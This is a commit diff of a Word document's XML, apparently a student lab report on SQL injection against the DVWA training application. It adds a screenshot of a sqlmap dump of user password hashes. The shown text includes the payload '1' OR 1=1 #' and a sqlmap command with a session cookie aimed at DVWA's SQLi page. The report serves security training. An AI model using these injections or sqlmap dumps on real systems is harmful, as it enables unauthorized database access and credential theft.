<commit_message>
Added Database Table Screenshot (SQLi)
</commit_message>
<xml_diff>
--- a/SQLi/SQLi_SHOWRAV_GHOSH_23-50666-1.docx
+++ b/SQLi/SQLi_SHOWRAV_GHOSH_23-50666-1.docx
@@ -878,16 +878,7 @@
           <w:b/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">( </w:t>
+        <w:t xml:space="preserve"> ( </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -895,16 +886,15 @@
           <w:bCs/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>Id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Id: 1’ OR 1=1</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>: 1’ OR 1=1</w:t>
+        <w:t xml:space="preserve"> # </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -912,26 +902,8 @@
           <w:bCs/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1074,25 +1046,7 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Screenshot 11: Running </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>SQLmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> with Cookie </w:t>
+        <w:t xml:space="preserve">Screenshot 11: Running SQLmap with Cookie </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1112,37 +1066,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -u "http://&lt;IP&gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dvwa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/vulnerabilities/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sqli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>yourvalue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">; security=low" </w:t>
+      <w:r>
+        <w:t xml:space="preserve">sqlmap -u "http://&lt;IP&gt;/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=yourvalue; security=low" </w:t>
       </w:r>
       <w:r>
         <w:t>–</w:t>
@@ -1281,7 +1206,128 @@
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Screenshot 12: SQLmap Output </w:t>
+        <w:t>Screenshot 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: SQLmap Full Database Table Dump </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> All 5 Users with Hashed Passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A64A96" wp14:editId="473666F2">
+            <wp:extent cx="5943600" cy="3640455"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="450306558" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="450306558" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3640455"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="200" w:after="80"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Screenshot 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: SQLmap Output </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1326,7 +1372,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2123,6 +2169,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

</xml_diff>